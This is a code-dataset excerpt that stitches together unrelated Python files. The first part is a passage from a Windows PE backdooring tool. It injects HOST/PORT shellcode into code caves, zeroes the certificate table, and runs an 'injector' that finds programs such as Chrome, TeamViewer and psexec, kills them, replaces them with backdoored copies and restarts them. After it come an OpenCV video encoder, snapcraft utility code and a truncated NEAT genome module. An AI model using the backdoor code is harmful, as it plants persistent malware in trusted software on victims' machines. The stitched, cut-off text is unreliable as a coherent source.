self.binary = open(self.flItms['backdoorfile'], "r+b")
#reserve space for shellcode
targetFile = intelCore(self.flItms, self.binary, self.VERBOSE)
# Finding the length of the resume Exe shellcode
if self.flItms['Magic'] == int('20B', 16):
_, self.flItms['resumeExe'] = targetFile.resume_execution_64()
else:
_, self.flItms['resumeExe'] = targetFile.resume_execution_32()
shellcode_length = len(self.flItms['shellcode'])
self.flItms['shellcode_length'] = shellcode_length + len(self.flItms['resumeExe'])
caves_set = False
while caves_set is False and self.flItms['NewCodeCave'] is False:
#if self.flItms['NewCodeCave'] is False:
#self.flItms['JMPtoCodeAddress'], self.flItms['CodeCaveLOC'] = (
self.flItms['CavesPicked'] = self.find_cave()
if type(self.flItms['CavesPicked']) == str:
if self.flItms['CavesPicked'].lower() in ['append', 'a']:
self.flItms['JMPtoCodeAddress'] = None
self.flItms['CodeCaveLOC'] = 0
self.flItms['cave_jumping'] = False
self.flItms['CavesPicked'] = {}
print "-resetting shells"
self.set_shells()
caves_set = True
elif self.flItms['CavesPicked'].lower() in ['jump', 'j']:
self.flItms['JMPtoCodeAddress'] = None
self.flItms['CodeCaveLOC'] = 0
self.flItms['cave_jumping'] = True
self.flItms['CavesPicked'] = {}
print "-resetting shells"
self.set_shells()
continue
elif self.flItms['CavesPicked'].lower() in ['single', 's']:
self.flItms['JMPtoCodeAddress'] = None
self.flItms['CodeCaveLOC'] = 0
self.flItms['cave_jumping'] = False
self.flItms['CavesPicked'] = {}
print "-resetting shells"
self.set_shells()
continue
elif self.flItms['CavesPicked'].lower() in ['ignore', 'i']:
#Let's say we don't want to patch a binary
return None
elif self.flItms['CavesPicked'] is None:
return None
else:
self.flItms['JMPtoCodeAddress'] = self.flItms['CavesPicked'].iteritems().next()[1][6]
caves_set = True
#else:
# caves_set = True
#If no cave found, continue to create one.
if self.flItms['JMPtoCodeAddress'] is None or self.flItms['NewCodeCave'] is True:
self.create_code_cave()
self.flItms['NewCodeCave'] = True
print "- Adding a new section to the exe/dll for shellcode injection"
else:
self.flItms['LastCaveAddress'] = self.flItms['CavesPicked'][len(self.flItms['CavesPicked']) - 1][6]
#Patch the entry point
targetFile = intelCore(self.flItms, self.binary, self.VERBOSE)
targetFile.patch_initial_instructions()
if self.flItms['Magic'] == int('20B', 16):
ReturnTrackingAddress, self.flItms['resumeExe'] = targetFile.resume_execution_64()
else:
ReturnTrackingAddress, self.flItms['resumeExe'] = targetFile.resume_execution_32()
self.set_shells()
if self.flItms['cave_jumping'] is True:
if self.flItms['stager'] is False:
temp_jmp = "\xe9"
breakupvar = eat_code_caves(self.flItms, 1, 2)
test_length = int(self.flItms['CavesPicked'][2][1], 16) - int(self.flItms['CavesPicked'][1][1], 16) - len(self.flItms['allshells'][1]) - 5
if test_length < 0:
temp_jmp += struct.pack("<I", 0xffffffff - abs(breakupvar - len(self.flItms['allshells'][1]) - 4))
else:
temp_jmp += struct.pack("<I", breakupvar - len(self.flItms['allshells'][1]) - 5)
self.flItms['allshells'] += (self.flItms['resumeExe'], )
self.flItms['completeShellcode'] = self.flItms['shellcode'] + self.flItms['resumeExe']
if self.flItms['NewCodeCave'] is True:
self.binary.seek(self.flItms['newSectionPointerToRawData'] + self.flItms['buffer'])
self.binary.write(self.flItms['completeShellcode'])
if self.flItms['cave_jumping'] is True:
for i, item in self.flItms['CavesPicked'].iteritems():
self.binary.seek(int(self.flItms['CavesPicked'][i][1], 16))
self.binary.write(self.flItms['allshells'][i])
#So we can jump to our resumeExe shellcode
if i == (len(self.flItms['CavesPicked']) - 2) and self.flItms['stager'] is False:
self.binary.write(temp_jmp)
else:
for i, item in self.flItms['CavesPicked'].iteritems():
if i == 0:
self.binary.seek(int(self.flItms['CavesPicked'][i][1], 16))
self.binary.write(self.flItms['completeShellcode'])
#Patch certTable
if self.ZERO_CERT is True:
print "[*] Overwriting certificate table pointer"
self.binary.seek(self.flItms['CertTableLOC'], 0)
self.binary.write("\x00\x00\x00\x00\x00\x00\x00\x00")
print "[*] {0} backdooring complete".format(self.FILE)
self.binary.close()
if self.VERBOSE is True:
self.print_flItms(self.flItms)
return True
def output_options(self):
"""
Output file check.
"""
if not self.OUTPUT:
self.OUTPUT = os.path.basename(self.FILE)
def set_shells(self):
"""
This function sets the shellcode.
"""
print "[*] Looking for and setting selected shellcode"
if self.flItms['Magic'] == int('10B', 16):
self.flItms['bintype'] = winI32_shellcode
if self.flItms['Magic'] == int('20B', 16):
self.flItms['bintype'] = winI64_shellcode
if not self.SHELL:
print "You must choose a backdoor to add: (use -s)"
for item in dir(self.flItms['bintype']):
if "__" in item:
continue
elif ("returnshellcode" == item
or "pack_ip_addresses" == item
or "eat_code_caves" == item
or 'ones_compliment' == item
or 'resume_execution' in item
or 'returnshellcode' in item):
continue
else:
print " {0}".format(item)
return False
if self.SHELL not in dir(self.flItms['bintype']):
print "The following %ss are available: (use -s)" % str(self.flItms['bintype']).split(".")[1]
for item in dir(self.flItms['bintype']):
#print item
if "__" in item:
continue
elif "returnshellcode" == item or "pack_ip_addresses" == item or "eat_code_caves" == item:
continue
else:
print " {0}".format(item)
return False
#else:
# shell_cmd = self.SHELL + "()"
self.flItms['shells'] = self.flItms['bintype'](self.HOST, self.PORT, self.SUPPLIED_SHELLCODE)
self.flItms['allshells'] = getattr(self.flItms['shells'], self.SHELL)(self.flItms, self.flItms['CavesPicked'])
self.flItms['shellcode'] = self.flItms['shells'].returnshellcode()
def injector(self):
"""
The injector module will hunt and injection shellcode into
targets that are in the list_of_targets dict.
Data format DICT: {process_name_to_backdoor :
[('dependencies to kill', ),
'service to kill', restart=True/False],
}
"""
list_of_targets = {'chrome.exe':
[('chrome.exe', ), None, True], 'hamachi-2.exe':
[('hamachi-2.exe', ), "Hamachi2Svc", True],
'tcpview.exe': [('tcpview.exe',), None, True],
#'rpcapd.exe':
#[('rpcapd.exe'), None, False],
'psexec.exe':
[('psexec.exe',), 'PSEXESVC.exe', False],
'vncserver.exe':
[('vncserver.exe', ), 'vncserver', True],
# must append code cave for vmtoolsd.exe
'vmtoolsd.exe':
[('vmtools.exe', 'vmtoolsd.exe'), 'VMTools', True],
'nc.exe': [('nc.exe', ), None, False],
'Start Tor Browser.exe':
[('Start Tor Browser.exe', ), None, False],
'procexp.exe': [('procexp.exe',
'procexp64.exe'), None, True],
'procmon.exe': [('procmon.exe',
'procmon64.exe'), None, True],
'TeamViewer.exe': [('tv_x64.exe',
'tv_x32.exe'), None, True]
}
print "[*] Beginning injector module"
os_name = os.name
if os_name == 'nt':
if "PROGRAMFILES(x86)" in os.environ:
print "-You have a 64 bit system"
system_type = 64
else:
print "-You have a 32 bit system"
system_type = 32
else:
print "This works only on windows. :("
sys.exit()
winversion = platform.version()
rootdir = os.path.splitdrive(sys.executable)[0]
#print rootdir
targetdirs = []
excludedirs = []
#print system_info
winXP2003x86targetdirs = [rootdir + '\\']
winXP2003x86excludedirs = [rootdir + '\\Windows\\',
rootdir + '\\RECYCLER\\',
'\\VMWareDnD\\']
vista7win82012x64targetdirs = [rootdir + '\\']
vista7win82012x64excludedirs = [rootdir + '\\Windows\\',
rootdir + '\\RECYCLER\\',
'\\VMwareDnD\\']
#need win2003, win2008, win8
if "5.0." in winversion:
print "-OS is 2000"
targetdirs = targetdirs + winXP2003x86targetdirs
excludedirs = excludedirs + winXP2003x86excludedirs
elif "5.1." in winversion:
print "-OS is XP"
if system_type == 64:
targetdirs.append(rootdir + '\\Program Files (x86)\\')
excludedirs.append(vista7win82012x64excludedirs)
else:
targetdirs = targetdirs + winXP2003x86targetdirs
excludedirs = excludedirs + winXP2003x86excludedirs
elif "5.2." in winversion:
print "-OS is 2003"
if system_type == 64:
targetdirs.append(rootdir + '\\Program Files (x86)\\')
excludedirs.append(vista7win82012x64excludedirs)
else:
targetdirs = targetdirs + winXP2003x86targetdirs
excludedirs = excludedirs + winXP2003x86excludedirs
elif "6.0." in winversion:
print "-OS is Vista/2008"
if system_type == 64:
targetdirs = targetdirs + vista7win82012x64targetdirs
excludedirs = excludedirs + vista7win82012x64excludedirs
else:
targetdirs.append(rootdir + '\\Program Files\\')
excludedirs.append(rootdir + '\\Windows\\')
elif "6.1." in winversion:
print "-OS is Win7/2008"
if system_type == 64:
targetdirs = targetdirs + vista7win82012x64targetdirs
excludedirs = excludedirs + vista7win82012x64excludedirs
else:
targetdirs.append(rootdir + '\\Program Files\\')
excludedirs.append(rootdir + '\\Windows\\')
elif "6.2." in winversion:
print "-OS is Win8/2012"
targetdirs = targetdirs + vista7win82012x64targetdirs
excludedirs = excludedirs + vista7win82012x64excludedirs
filelist = set()
exclude = False
for path in targetdirs:
for root, subFolders, files in os.walk(path):
for directory in excludedirs:
if directory.lower() in root.lower():
#print directory.lower(), root.lower()
#print "Path not allowed", root
exclude = True
#print exclude
break
if exclude is False:
for _file in files:
f = os.path.join(root, _file)
for target, items in list_of_targets.iteritems():
if target.lower() == _file.lower():
#print target, f
print "-- Found the following file:", root + '\\' + _file
filelist.add(f)
#print exclude
exclude = False
#grab tasklist
process_list = []
all_process = os.popen("tasklist.exe")
ap = all_process.readlines()
all_process.close()
ap.pop(0) # remove blank line
ap.pop(0) # remove header line
ap.pop(0) # remove this ->> =======
for process in ap:
process_list.append(process.split())
#print process_list
#print filelist
for target in filelist:
service_target = False
running_proc = False
#get filename
#support_result = support_check(target, 0)
#if support_result is False:
# continue
filename = os.path.basename(target)
for process in process_list:
#print process
for setprocess, items in list_of_targets.iteritems():
if setprocess.lower() in target.lower():
#print setprocess, process
for item in items[0]:
if item.lower() in [x.lower() for x in process]:
print "- Killing process:", item
try:
#print process[1]
os.system("taskkill /F /PID %i" %
int(process[1]))
running_proc = True
except Exception as e:
print str(e)
if setprocess.lower() in [x.lower() for x in process]:
#print True, items[0], items[1]
if items[1] is not None:
print "- Killing Service:", items[1]
try:
os.system('net stop %s' % items[1])
except Exception as e:
print str(e)
service_target = True
time.sleep(1)
#backdoor the targets here:
print "*" * 50
self.FILE = target
self.OUTPUT = os.path.basename(self.FILE + '.bd')
print "self.OUTPUT", self.OUTPUT
print "- Backdooring:", self.FILE
result = self.patch_pe()
if result:
pass
else:
continue
shutil.copy2(self.FILE, self.FILE + self.SUFFIX)
os.chmod(self.FILE, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
time.sleep(1)
try:
os.unlink(self.FILE)
except:
print "unlinking error"
time.sleep(.5)
try:
shutil.copy2(self.OUTPUT, self.FILE)
except:
os.system('move {0} {1}'.format(self.FILE, self.OUTPUT))
time.sleep(.5)
os.remove(self.OUTPUT)
print (" - The original file {0} has been renamed to {1}".format(self.FILE,
self.FILE + self.SUFFIX))
if self.DELETE_ORIGINAL is True:
print "!!Warning Deleteing Original File!!"
os.remove(self.FILE + self.SUFFIX)
if service_target is True:
#print "items[1]:", list_of_targets[filename][1]
os.system('net start %s' % list_of_targets[filename][1])
else:
try:
if (list_of_targets[filename][2] is True and
running_proc is True):
subprocess.Popen([self.FILE, ])
print "- Restarting:", self.FILE
else:
print "-- %s was not found online - not restarting" % self.FILE
except:
if (list_of_targets[filename.lower()][2] is True and
running_proc is True):
subprocess.Popen([self.FILE, ])
print "- Restarting:", self.FILE
else:
print "-- %s was not found online - not restarting" % self.FILE
| gpl-3.0 | -1,369,329,645,116,319,000 | 45.241232 | 154 | 0.514337 | false |
learningequality/video-vectorization | video_processing/processors/opencv_video_encoder.py | 1 | 1460 | """A video encoder processor that uses OpenCV to write video frames to a file.
A wrapper around the OpenCV VideoWriter class.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from video_processing import stream_processor
import cv2
class OpenCVVideoEncoderProcessor(stream_processor.ProcessorBase):
"""Processor for encoding video using OpenCV."""
def __init__(self, configuration):
self._output_video_file = configuration.get('output_video_file', '')
self._video_stream_name = configuration.get('video_stream_name', 'video')
self._fourcc_string = configuration.get('fourcc', 'DIVX')
self._index = 0
def open(self, stream_set):
fourcc = cv2.VideoWriter_fourcc(*self._fourcc_string)
frame_rate = stream_set.frame_rate_hz
header = stream_set.stream_headers[
self._video_stream_name].header_data
self._video_writer = cv2.VideoWriter(self._output_video_file, fourcc,
frame_rate,
(header.image_width,
header.image_height))
return stream_set
def process(self, frame_set):
if frame_set.get(self._video_stream_name, False):
video_frame = frame_set[self._video_stream_name].data
self._video_writer.write(video_frame)
return frame_set
def close(self):
self._video_writer.release()
return []
| mit | -5,255,766,905,365,025,000 | 33.761905 | 78 | 0.652055 | false |
cprov/snapcraft | snapcraft/internal/common.py | 1 | 8803 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2015-2017 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Data/methods shared between plugins and snapcraft
import glob
import logging
import math
import os
import shlex
import shutil
import subprocess
import sys
import tempfile
import urllib
from contextlib import suppress
from typing import Callable, List
from snapcraft.internal import errors
SNAPCRAFT_FILES = [
"snapcraft.yaml",
".snapcraft.yaml",
"parts",
"stage",
"prime",
"snap",
]
_DEFAULT_PLUGINDIR = os.path.join(sys.prefix, "share", "snapcraft", "plugins")
_plugindir = _DEFAULT_PLUGINDIR
_DEFAULT_SCHEMADIR = os.path.join(sys.prefix, "share", "snapcraft", "schema")
_schemadir = _DEFAULT_SCHEMADIR
_DEFAULT_LIBRARIESDIR = os.path.join(sys.prefix, "share", "snapcraft", "libraries")
_librariesdir = _DEFAULT_LIBRARIESDIR
_DOCKERENV_FILE = "/.dockerenv"
MAX_CHARACTERS_WRAP = 120
env = [] # type: List[str]
logger = logging.getLogger(__name__)
def assemble_env():
return "\n".join(["export " + e for e in env])
def _run(cmd: List[str], runner: Callable, **kwargs):
assert isinstance(cmd, list), "run command must be a list"
cmd_string = " ".join([shlex.quote(c) for c in cmd])
# FIXME: This is gross to keep writing this, even when env is the same
with tempfile.TemporaryFile(mode="w+") as run_file:
print(assemble_env(), file=run_file)
print("exec {}".format(cmd_string), file=run_file)
run_file.flush()
run_file.seek(0)
try:
return runner(["/bin/sh"], stdin=run_file, **kwargs)
except subprocess.CalledProcessError as call_error:
raise errors.SnapcraftCommandError(
command=cmd_string, call_error=call_error
) from call_error
def run(cmd: List[str], **kwargs) -> None:
_run(cmd, subprocess.check_call, **kwargs)
def run_output(cmd: List[str], **kwargs) -> str:
output = _run(cmd, subprocess.check_output, **kwargs)
try:
return output.decode(sys.getfilesystemencoding()).strip()
except UnicodeEncodeError:
logger.warning("Could not decode output for {!r} correctly".format(cmd))
return output.decode("latin-1", "surrogateescape").strip()
def get_core_path(base):
"""Returns the path to the core base snap."""
return os.path.join(os.path.sep, "snap", base, "current")
def format_snap_name(snap, *, allow_empty_version: bool = False) -> str:
"""Return a filename representing the snap depending on snap attributes.
:param dict snap: a dictionary of keys containing name, version and arch.
:param bool allow_empty_version: if set a filename without a version is
allowed.
"""
if allow_empty_version and snap.get("version") is None:
template = "{name}_{arch}.snap"
else:
template = "{name}_{version}_{arch}.snap"
if "arch" not in snap:
snap["arch"] = snap.get("architectures", None)
if not snap["arch"]:
snap["arch"] = "all"
elif len(snap["arch"]) == 1:
snap["arch"] = snap["arch"][0]
else:
snap["arch"] = "multi"
return template.format(**snap)
def is_snap() -> bool:
snap_name = os.environ.get("SNAP_NAME", "")
is_snap = snap_name == "snapcraft"
logger.debug(
"snapcraft is running as a snap {!r}, "
"SNAP_NAME set to {!r}".format(is_snap, snap_name)
)
return is_snap
def is_docker_instance() -> bool:
return os.path.exists(_DOCKERENV_FILE)
def set_plugindir(plugindir):
global _plugindir
_plugindir = plugindir
def get_plugindir():
return _plugindir
def set_schemadir(schemadir):
global _schemadir
_schemadir = schemadir
def get_schemadir():
return _schemadir
def get_arch_triplet():
raise errors.PluginOutdatedError("use 'project.arch_triplet'")
def get_arch():
raise errors.PluginOutdatedError("use 'project.deb_arch'")
def get_parallel_build_count():
raise errors.PluginOutdatedError("use 'parallel_build_count'")
def set_librariesdir(librariesdir):
global _librariesdir
_librariesdir = librariesdir
def get_librariesdir():
return _librariesdir
def get_python2_path(root):
"""Return a valid PYTHONPATH or raise an exception."""
python_paths = glob.glob(
os.path.join(root, "usr", "lib", "python2*", "dist-packages")
)
try:
return python_paths[0]
except IndexError:
raise errors.SnapcraftEnvironmentError(
"PYTHONPATH cannot be set for {!r}".format(root)
)
def get_url_scheme(url):
return urllib.parse.urlparse(url).scheme
def isurl(url):
return get_url_scheme(url) != ""
def reset_env():
global env
env = []
def get_terminal_width(max_width=MAX_CHARACTERS_WRAP):
if os.isatty(1):
width = shutil.get_terminal_size().columns
else:
width = MAX_CHARACTERS_WRAP
if max_width:
width = min(max_width, width)
return width
def format_output_in_columns(
elements_list, max_width=MAX_CHARACTERS_WRAP, num_col_spaces=2
):
"""Return a formatted list of strings ready to be printed line by line
elements_list is the list of elements ready to be printed on the output
max_width is the number of caracters the output shouldn't exceed
num_col_spaces is the number of spaces set between 2 columns"""
# First, try to get the starting point in term of number of lines
total_num_chars = sum([len(elem) for elem in elements_list])
num_lines = math.ceil(
(total_num_chars + (len(elements_list) - 1) * num_col_spaces) / max_width
)
sep = " " * num_col_spaces
candidate_output = []
while not candidate_output:
# dispatch elements in resulting list until num_lines
for i, element in enumerate(elements_list):
# for new columns, get the maximum width of this column
if i % num_lines == 0:
col_width = 0
for j in range(i, i + num_lines):
# ignore non existing elements at the end
with suppress(IndexError):
col_width = max(len(elements_list[j]), col_width)
if i < num_lines:
candidate_output.append([])
candidate_output[i % num_lines].append(element.ljust(col_width))
# check that any line (like the first one) is still smaller than
# max_width
if len(sep.join(candidate_output[0])) > max_width:
# reset and try with one more line
num_lines += 1
candidate_output = []
result_output = []
for i, line in enumerate(candidate_output):
result_output.append(sep.join(candidate_output[i]))
return result_output
def get_include_paths(root, arch_triplet):
paths = [
os.path.join(root, "include"),
os.path.join(root, "usr", "include"),
os.path.join(root, "include", arch_triplet),
os.path.join(root, "usr", "include", arch_triplet),
]
return [p for p in paths if os.path.exists(p)]
def get_library_paths(root, arch_triplet, existing_only=True):
"""Returns common library paths for a snap.
If existing_only is set the paths returned must exist for
the root that was set.
"""
paths = [
os.path.join(root, "lib"),
os.path.join(root, "usr", "lib"),
os.path.join(root, "lib", arch_triplet),
os.path.join(root, "usr", "lib", arch_triplet),
]
if existing_only:
paths = [p for p in paths if os.path.exists(p)]
return paths
def get_pkg_config_paths(root, arch_triplet):
paths = [
os.path.join(root, "lib", "pkgconfig"),
os.path.join(root, "lib", arch_triplet, "pkgconfig"),
os.path.join(root, "usr", "lib", "pkgconfig"),
os.path.join(root, "usr", "lib", arch_triplet, "pkgconfig"),
os.path.join(root, "usr", "share", "pkgconfig"),
os.path.join(root, "usr", "local", "lib", "pkgconfig"),
os.path.join(root, "usr", "local", "lib", arch_triplet, "pkgconfig"),
os.path.join(root, "usr", "local", "share", "pkgconfig"),
]
return [p for p in paths if os.path.exists(p)]
| gpl-3.0 | 2,794,462,511,097,129,500 | 28.639731 | 83 | 0.635352 | false |
machinebrains/neat-python | neatsociety/genome.py | 1 | 18567 | from random import choice, gauss, randint, random, shuffle
import math
class Genome(object):
""" A genome for general recurrent neural networks. """
def __init__(self, ID, config, parent1_id, parent2_id):
self.ID = ID
self.config = config
self.num_inputs = config.input_nodes
self.num_outputs = config.output_nodes
# (id, gene) pairs for connection and node gene sets.
self.conn_genes = {}
self.node_genes = {}
self.fitness = None
self.species_id = None
# my parents id: helps in tracking genome's genealogy
self.parent1_id = parent1_id
self.parent2_id = parent2_id
def mutate(self, innovation_indexer):
""" Mutates this genome """
# TODO: Make a configuration item to choose whether or not multiple mutations can happen at once.
if random() < self.config.prob_add_node:
self.mutate_add_node(innovation_indexer)
if random() < self.config.prob_add_conn:
self.mutate_add_connection(innovation_indexer)
if random() < self.config.prob_delete_node:
self.mutate_delete_node()
if random() < self.config.prob_delete_conn:
self.mutate_delete_connection()
# Mutate connection genes (weights, enabled, etc.).
for cg in self.conn_genes.values():
cg.mutate(self.config)
# Mutate node genes (bias, response, etc.).
for ng in self.node_genes.values():
if ng.type != 'INPUT':
ng.mutate(self.config)
return self
def crossover(self, other, child_id):
""" Crosses over parents' genomes and returns a child. """
# Parents must belong to the same species.
assert self.species_id == other.species_id, 'Different parents species ID: {0} vs {1}'.format(self.species_id,
other.species_id)
# TODO: if they're of equal fitness, choose the shortest
if self.fitness > other.fitness:
parent1 = self
parent2 = other
else:
parent1 = other
parent2 = self
# creates a new child
child = self.__class__(child_id, self.config, self.ID, other.ID)
child.inherit_genes(parent1, parent2)
child.species_id = parent1.species_id
return child
def inherit_genes(self, parent1, parent2):
""" Applies the crossover operator. """
assert (parent1.fitness >= parent2.fitness)
# Crossover connection genes
for cg1 in parent1.conn_genes.values():
try:
cg2 = parent2.conn_genes[cg1.key]
except KeyError:
# Copy excess or disjoint genes from the fittest parent
self.conn_genes[cg1.key] = cg1.copy()
else:
if cg2.is_same_innov(cg1): # Always true for *global* INs
# Homologous gene found
new_gene = cg1.get_child(cg2)
else:
new_gene = cg1.copy()
self.conn_genes[new_gene.key] = new_gene
# Crossover node genes
for ng1_id, ng1 in parent1.node_genes.items():
ng2 = parent2.node_genes.get(ng1_id)
if ng2 is None:
# copies extra genes from the fittest parent
new_gene = ng1.copy()
else:
# matching node genes: randomly selects the neuron's bias and response
new_gene = ng1.get_child(ng2)
assert new_gene.ID not in self.node_genes
self.node_genes[new_gene.ID] = new_gene
def get_new_hidden_id(self):
new_id = 0
while new_id in self.node_genes:
new_id += 1
return new_id
def mutate_add_node(self, innovation_indexer):
if not self.conn_genes:
return None
# Choose a random connection to split
conn_to_split = choice(list(self.conn_genes.values()))
new_node_id = self.get_new_hidden_id()
act_func = choice(self.config.activation_functions)
ng = self.config.node_gene_type(new_node_id, 'HIDDEN', activation_type=act_func)
assert ng.ID not in self.node_genes
self.node_genes[ng.ID] = ng
new_conn1, new_conn2 = conn_to_split.split(innovation_indexer, ng.ID)
self.conn_genes[new_conn1.key] = new_conn1
self.conn_genes[new_conn2.key] = new_conn2
return ng, conn_to_split # the return is only used in genome_feedforward
def mutate_add_connection(self, innovation_indexer):
'''
Attempt to add a new connection, the only restriction being that the output
node cannot be one of the network input nodes.
'''
in_node = choice(list(self.node_genes.values()))
# TODO: We do this filtering of input/output/hidden nodes a lot;
# they should probably be separate collections.
possible_outputs = [n for n in self.node_genes.values() if n.type != 'INPUT']
out_node = choice(possible_outputs)
# Only create the connection if it doesn't already exist.
key = (in_node.ID, out_node.ID)
if key not in self.conn_genes:
weight = gauss(0, self.config.weight_stdev)
enabled = choice([False, True])
innovation_id = innovation_indexer.get_innovation_id(in_node.ID, out_node.ID)
cg = self.config.conn_gene_type(innovation_id, in_node.ID, out_node.ID, weight, enabled)
self.conn_genes[cg.key] = cg
def mutate_delete_node(self):
# Do nothing if there are no hidden nodes.
if len(self.node_genes) <= self.num_inputs + self.num_outputs:
return -1
idx = None
while 1:
idx = choice(list(self.node_genes.keys()))
if self.node_genes[idx].type == 'HIDDEN':
break
node = self.node_genes[idx]
node_id = node.ID
keys_to_delete = set()
for key, value in self.conn_genes.items():
if value.in_node_id == node_id or value.out_node_id == node_id:
keys_to_delete.add(key)
# Do not allow deletion of all connection genes.
if len(keys_to_delete) >= len(self.conn_genes):
return -1
for key in keys_to_delete:
del self.conn_genes[key]
del self.node_genes[idx]
assert len(self.conn_genes) > 0
assert len(self.node_genes) >= self.num_inputs + self.num_outputs
return node_id
def mutate_delete_connection(self):
if len(self.conn_genes) > self.num_inputs + self.num_outputs:
key = choice(list(self.conn_genes.keys()))
del self.conn_genes[key]
assert len(self.conn_genes) > 0
assert len(self.node_genes) >= self.num_inputs + self.num_outputs
# compatibility function
def distance(self, other):
""" Returns the distance between this genome and the other. """
if len(self.conn_genes) > len(other.conn_genes):
genome1 = self
genome2 = other
else:
genome1 = other
genome2 = self
# Compute node gene differences.
excess1 = sum(1 for k1 in genome1.node_genes if k1 not in genome2.node_genes)
excess2 = sum(1 for k2 in genome2.node_genes if k2 not in genome1.node_genes)
common_nodes = [k1 for k1 in genome1.node_genes if k1 in genome2.node_genes]
bias_diff = 0.0
response_diff = 0.0
activation_diff = 0
for n in common_nodes:
g1 = genome1.node_genes[n]
g2 = genome2.node_genes[n]
bias_diff += math.fabs(g1.bias - g2.bias)
response_diff += math.fabs(g1.response - g2.response)
if g1.activation_type != g2.activation_type:
activation_diff += 1
most_nodes = max(len(genome1.node_genes), len(genome2.node_genes))
distance = (self.config.excess_coefficient * float(excess1 + excess2) / most_nodes
+ self.config.excess_coefficient * float(activation_diff) / most_nodes
+ self.config.weight_coefficient * (bias_diff + response_diff) / len(common_nodes))
# Compute connection gene differences.
if genome1.conn_genes:
N = len(genome1.conn_genes)
weight_diff = 0
matching = 0
disjoint = 0
excess = 0
max_cg_genome2 = None
if genome2.conn_genes:
max_cg_genome2 = max(genome2.conn_genes.values())
for cg1 in genome1.conn_genes.values():
try:
cg2 = genome2.conn_genes[cg1.key]
except KeyError:
if max_cg_genome2 is not None and cg1 > max_cg_genome2:
excess += 1
else:
disjoint += 1
else:
# Homologous genes
weight_diff += math.fabs(cg1.weight - cg2.weight)
matching += 1
if cg1.enabled != cg2.enabled:
weight_diff += 1.0
disjoint += len(genome2.conn_genes) - matching
distance += self.config.excess_coefficient * float(excess) / N
distance += self.config.disjoint_coefficient * float(disjoint) / N
if matching > 0:
distance += self.config.weight_coefficient * (weight_diff / matching)
return distance
def size(self):
'''Returns genome 'complexity', taken to be (number of hidden nodes, number of enabled connections)'''
num_hidden_nodes = len(self.node_genes) - self.num_inputs - self.num_outputs
num_enabled_connections = sum([1 for cg in self.conn_genes.values() if cg.enabled is True])
return num_hidden_nodes, num_enabled_connections
def __lt__(self, other):
'''Order genomes by fitness.'''
return self.fitness < other.fitness
def __str__(self):
s = "Nodes:"
for ng in self.node_genes.values():
s += "\n\t" + str(ng)
s += "\nConnections:"
connections = list(self.conn_genes.values())
connections.sort()
for c in connections:
s += "\n\t" + str(c)
return s
def add_hidden_nodes(self, num_hidden):
node_id = self.get_new_hidden_id()
for i in range(num_hidden):
act_func = choice(self.config.activation_functions)
node_gene = self.config.node_gene_type(node_id,
node_type='HIDDEN',
activation_type=act_func)
assert node_gene.ID not in self.node_genes
self.node_genes[node_gene.ID] = node_gene
node_id += 1
# TODO: Can this be changed to not need a configuration object?
@classmethod
def create_unconnected(cls, ID, config):
'''Create a genome for a network with no hidden nodes and no connections.'''
c = cls(ID, config, None, None)
node_id = 0
# Create input node genes.
for i in range(config.input_nodes):
assert node_id not in c.node_genes
c.node_genes[node_id] = config.node_gene_type(node_id, 'INPUT')
node_id += 1
# Create output node genes.
for i in range(config.output_nodes):
act_func = choice(config.activation_functions)
node_gene = config.node_gene_type(node_id,
node_type='OUTPUT',
activation_type=act_func)
assert node_gene.ID not in c.node_genes
c.node_genes[node_gene.ID] = node_gene
node_id += 1
assert node_id == len(c.node_genes)
return c
def connect_fs_neat(self, innovation_indexer):
""" Randomly connect one input to all hidden and output nodes (FS-NEAT). """
in_genes = [g for g in self.node_genes.values() if g.type == 'INPUT']
hid_genes = [g for g in self.node_genes.values() if g.type == 'HIDDEN']
out_genes = [g for g in self.node_genes.values() if g.type == 'OUTPUT']
ig = choice(in_genes)
for og in hid_genes + out_genes:
weight = gauss(0, self.config.weight_stdev)
innovation_id = innovation_indexer.get_innovation_id(ig.ID, og.ID)
cg = self.config.conn_gene_type(innovation_id, ig.ID, og.ID, weight, True)
self.conn_genes[cg.key] = cg
def compute_full_connections(self):
""" Create a fully-connected genome. """
in_genes = [g for g in self.node_genes.values() if g.type == 'INPUT']
hid_genes = [g for g in self.node_genes.values() if g.type == 'HIDDEN']
out_genes = [g for g in self.node_genes.values() if g.type == 'OUTPUT']
# Connect each input node to all hidden and output nodes.
connections = []
for ig in in_genes:
for og in hid_genes + out_genes:
connections.append((ig.ID, og.ID))
# Connect each hidden node to all output nodes.
for hg in hid_genes:
for og in out_genes:
connections.append((hg.ID, og.ID))
return connections
def connect_full(self, innovation_indexer):
""" Create a fully-connected genome. """
for input_id, output_id in self.compute_full_connections():
weight = gauss(0, self.config.weight_stdev)
innovation_id = innovation_indexer.get_innovation_id(input_id, output_id)
cg = self.config.conn_gene_type(innovation_id, input_id, output_id, weight, True)
self.conn_genes[cg.key] = cg
def connect_partial(self, innovation_indexer, fraction):
assert 0 <= fraction <= 1
all_connections = self.compute_full_connections()
shuffle(all_connections)
num_to_add = int(round(len(all_connections) * fraction))
for input_id, output_id in all_connections[:num_to_add]:
weight = gauss(0, self.config.weight_stdev)
innovation_id = innovation_indexer.get_innovation_id(input_id, output_id)
cg = self.config.conn_gene_type(innovation_id, input_id, output_id, weight, True)
self.conn_genes[cg.key] = cg
class FFGenome(Genome):
""" A genome for feed-forward neural networks. Feed-forward
topologies are a particular case of Recurrent NNs.
"""
def __init__(self, ID, config, parent1_id, parent2_id):
super(FFGenome, self).__init__(ID, config, parent1_id, parent2_id)
self.node_order = [] # hidden node order
def inherit_genes(self, parent1, parent2):
super(FFGenome, self).inherit_genes(parent1, parent2)
self.node_order = list(parent1.node_order)
assert (len(self.node_order) == len([n for n in self.node_genes.values() if n.type == 'HIDDEN']))
def mutate_add_node(self, innovation_indexer):
result = super(FFGenome, self).mutate_add_node(innovation_indexer)
if result is None:
return
ng, split_conn = result
# Add node to node order list: after the presynaptic node of the split connection
# and before the postsynaptic node of the split connection
